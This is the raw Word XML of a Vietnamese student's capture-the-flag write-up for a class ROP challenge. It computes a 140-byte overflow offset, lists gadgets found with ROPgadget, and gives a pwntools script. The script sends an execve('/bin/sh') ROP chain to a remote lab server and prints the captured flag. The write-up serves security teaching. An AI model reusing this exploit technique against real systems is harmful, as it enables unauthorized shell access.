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392E" w14:textId="3B6B0D0F" w:rsidR="00AF5FB2" w:rsidRDefault="00E1186A" w:rsidP="00725FBB">
      <w:pPr>
        <w:jc w:val="center"/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>ROPchain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18809FBB" w14:textId="08BB28B2" w:rsidR="00B10559" w:rsidRDefault="00B10559">
      <w:pPr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>Vì bài khá giống với ROPbasic trên lớp nên sẽ bỏ qua bước xem file và checksec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E0BECF" w14:textId="5CED591D" w:rsidR="00725FBB" w:rsidRDefault="00725FBB">
      <w:pPr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>ROPchain.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FD985E" w14:textId="3ABDCD3F" w:rsidR="00725FBB" w:rsidRDefault="00725FBB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00725FBB">
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E77C9CC" wp14:editId="74855DC4">
            <wp:extent cx="4496427" cy="3772426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EF63" w14:textId="4EA23A7D" w:rsidR="00F54F59" w:rsidRDefault="00440024">
      <w:pPr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 xml:space="preserve">Tại hàm main của </w:t>
      </w:r>
      <w:r w:rsidR="00463C15">
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ROPchain ta thấy được mục tiêu ở đây sẽ </w:t>
      </w:r>
      <w:r w:rsidR="004B4B33">
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>khai thác vào hàm vunl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AAA706" w14:textId="58D5BAE7" w:rsidR="004B4B33" w:rsidRDefault="004B4B33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B4B33">
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CBBD73F" wp14:editId="7C0B4EAA">
            <wp:extent cx="5731510" cy="174625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2688" w14:textId="5276BD4A" w:rsidR="004B4B33" w:rsidRDefault="009E10ED">
      <w:pPr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 xml:space="preserve">Khi dùng IDA ta thấy buffer ở hàm </w:t>
      </w:r>
      <w:r w:rsidR="001812FD">
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vunl có độ dài buffer là 0x88</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30489BD2" w14:textId="6D2EFD1C" w:rsidR="001812FD" w:rsidRDefault="008466AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008466AC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57863D64" wp14:editId="53EE047C">
            <wp:extent cx="4105848" cy="1657581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02DF" w14:textId="58551458" w:rsidR="008466AC" w:rsidRDefault="008466AC">
      <w:pPr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 xml:space="preserve">Như đã biết thì nếu ta muốn ghi đè luôn của return address thì ta cần thêm 0x4 </w:t>
      </w:r>
      <w:r w:rsidR="00311B66">
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nữa nên ta sẽ cần 0x88 + 0x4 =0x8c</w:t>
      </w:r>
      <w:r w:rsidR="00DE0D44">
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> đổi ra Dec sẽ là </w:t>
      </w:r>
      <w:r w:rsidR="00D815C9">
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>140</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06572F70" w14:textId="2F9EDA89" w:rsidR="00311B66" w:rsidRDefault="00311B66">
      <w:pPr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>Bước tiếp theo ta s</w:t>
      </w:r>
      <w:r w:rsidR="00D815C9">
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ử</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> dụng ROPgadget để tìm các gadget để exploit</w:t>
      </w:r>
      <w:r w:rsidR="00E75CD1">
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C32836C" w14:textId="571F99CE" w:rsidR="00A75A3D" w:rsidRDefault="00AB2767">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB2767">
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="725C6054" wp14:editId="45C838B5">
            <wp:extent cx="5731510" cy="112966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3AE7" w14:textId="11FFF4B0" w:rsidR="00E75CD1" w:rsidRDefault="00725FBB" w:rsidP="00725FBB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr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>eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA4AE3B" w14:textId="36213397" w:rsidR="00725FBB" w:rsidRDefault="00437A92" w:rsidP="00725FBB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00437A92">
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2048B6CB" wp14:editId="20995A12">
            <wp:extent cx="4601217" cy="1619476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F389" w14:textId="29C8248E" w:rsidR="00437A92" w:rsidRDefault="00437A92" w:rsidP="00725FBB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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 xml:space="preserve">Ta sẽ chọn 0x080a89e6 </w:t>
      </w:r>
      <w:r w:rsidR="00192AC9">
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># pop eax; ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2F3379" w14:textId="526C0AA8" w:rsidR="00192AC9" w:rsidRDefault="00192AC9" w:rsidP="00192AC9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr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 xml:space="preserve">edx, ecx, ebx </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E1A98C" w14:textId="704DB1B1" w:rsidR="00A40B44" w:rsidRDefault="00FE7787" w:rsidP="00A40B44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE7787">
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76091D5B" wp14:editId="56B81D6D">
            <wp:extent cx="4763165" cy="1686160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DFF" w14:textId="5522ACD5" w:rsidR="00FE7787" w:rsidRDefault="00656060" w:rsidP="00742F37">
      <w:pPr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ab/>
      </w:r>
      <w:r w:rsidR="0015701C">
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tiếp theo sẽ là đến string /bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4D3E72" w14:textId="7FBB5CE3" w:rsidR="0015701C" w:rsidRDefault="0015701C" w:rsidP="00640C0E">
      <w:pPr>
        <w:ind w:left="720"/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lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00640C0E" w:rsidRPr="00640C0E">
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C5A0BB3" wp14:editId="23C60BB1">
            <wp:extent cx="5731510" cy="1017905"/>
            <wp:effectExtent l="0" t="0" r="254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7DA1" w14:textId="38B10A23" w:rsidR="00640C0E" w:rsidRDefault="00640C0E" w:rsidP="00640C0E">
      <w:pPr>
        <w:ind w:left="720"/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>Và cuối cùng sẽ là đến int</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADEC497" w14:textId="3FA9F56C" w:rsidR="00640C0E" w:rsidRDefault="00ED0616" w:rsidP="00640C0E">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED0616">
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="579774DE" wp14:editId="5E2EACD9">
            <wp:extent cx="5731510" cy="1148080"/>
            <wp:effectExtent l="0" t="0" r="254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FBFC" w14:textId="06E4500D" w:rsidR="00ED0616" w:rsidRDefault="00CC2A41" w:rsidP="00640C0E">
      <w:pPr>
        <w:ind w:left="720"/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 xml:space="preserve">Khi đã có đầy đủ kích thước, các gadget thì ta seur dụng code payload mà thầy đã cung cấp từ trước ta có code: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D623751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from pwn import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF0F9C4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#p = process('./ROPchain')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AA97CB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 = remote('45.122.249.68', 10002)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598DF414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print(p.recvuntil(':\n'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D978FC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</w:p>
    <w:p w14:paraId="73032D97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payload = b'A'*140</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF8F616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</w:p>
    <w:p w14:paraId="79058A1F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 xml:space="preserve">payload += p32(0x080a89e6) #pop eax ; ret </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6490C92F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payload += p32(0xb)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21830F14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payload += p32(0x0806e051) #pop edx ; pop ecx ; pop ebx ; ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE64789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payload += p32(0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C53215F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payload += p32(0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3401BD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payload += p32(0x080d9068) # /bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2233B3C3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payload += p32(0x080495a3) #int 0x80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3483FC4F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</w:p>
    <w:p w14:paraId="46732C94" w14:textId="77777777" w:rsidR="00397896" w:rsidRPr="00397896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p.sendline(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F641AC" w14:textId="5660DC83" w:rsidR="00CC2A41" w:rsidRDefault="00397896" w:rsidP="00397896">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397896">
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF87F1B" w14:textId="0092945C" w:rsidR="00397896" w:rsidRDefault="004665E0" w:rsidP="00397896">
      <w:pPr>
        <w:ind w:left="720"/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lastRenderedPageBreak/>
        <w:t>và kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125245EC" w14:textId="1AC04831" w:rsidR="004665E0" w:rsidRDefault="00DA7D6E" w:rsidP="00397896">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA7D6E">
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62F99B0F" wp14:editId="3774E6A0">
            <wp:extent cx="5731510" cy="269113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3EE4" w14:textId="4A0513E5" w:rsidR="00DA7D6E" w:rsidRPr="00742F37" w:rsidRDefault="00DA7D6E" w:rsidP="00397896">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Flag: </w:t>
      </w:r>
      <w:r w:rsidR="00B157EC" w:rsidRPr="00B157EC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>flag{dung_thay_hoa_no_ma_ngo_xuan_ve}</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00DA7D6E" w:rsidRPr="0074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80D70"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C8F299B6"/>
    <w:lvl w:ilvl="0" w:tplc="E35A7136">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="UTM Neo Sans Intel" w:eastAsiaTheme="minorHAnsi" w:hAnsi="UTM Neo Sans Inte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AD"/>
    <w:rsid w:val="0015701C"/>
    <w:rsid w:val="001812FD"/>
    <w:rsid w:val="00192AC9"/>
    <w:rsid w:val="00311B66"/>
    <w:rsid w:val="00397896"/>
    <w:rsid w:val="00437A92"/>
    <w:rsid w:val="00440024"/>
    <w:rsid w:val="00463C15"/>
    <w:rsid w:val="004665E0"/>
    <w:rsid w:val="004B4B33"/>
    <w:rsid w:val="00640C0E"/>
    <w:rsid w:val="00656060"/>
    <w:rsid w:val="00725FBB"/>
    <w:rsid w:val="00742F37"/>
    <w:rsid w:val="008466AC"/>
    <w:rsid w:val="009E10ED"/>
    <w:rsid w:val="00A40B44"/>
    <w:rsid w:val="00A75A3D"/>
    <w:rsid w:val="00AB2767"/>
    <w:rsid w:val="00AF5FB2"/>
    <w:rsid w:val="00B10559"/>
    <w:rsid w:val="00B157EC"/>
    <w:rsid w:val="00CC2A41"/>
    <w:rsid w:val="00D815C9"/>
    <w:rsid w:val="00DA7D6E"/>
    <w:rsid w:val="00DE0D44"/>
    <w:rsid w:val="00E1186A"/>
    <w:rsid w:val="00E75CD1"/>
    <w:rsid w:val="00ED0616"/>
    <w:rsid w:val="00F35EAD"/>
    <w:rsid w:val="00F54F59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0C905"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E4FCE932-46B1-43CE-8491-B2963057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Trình</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Lê Công Trình</cp:lastModifiedBy>
  <cp:revision>31</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-11-08T07:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-11-08T07:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>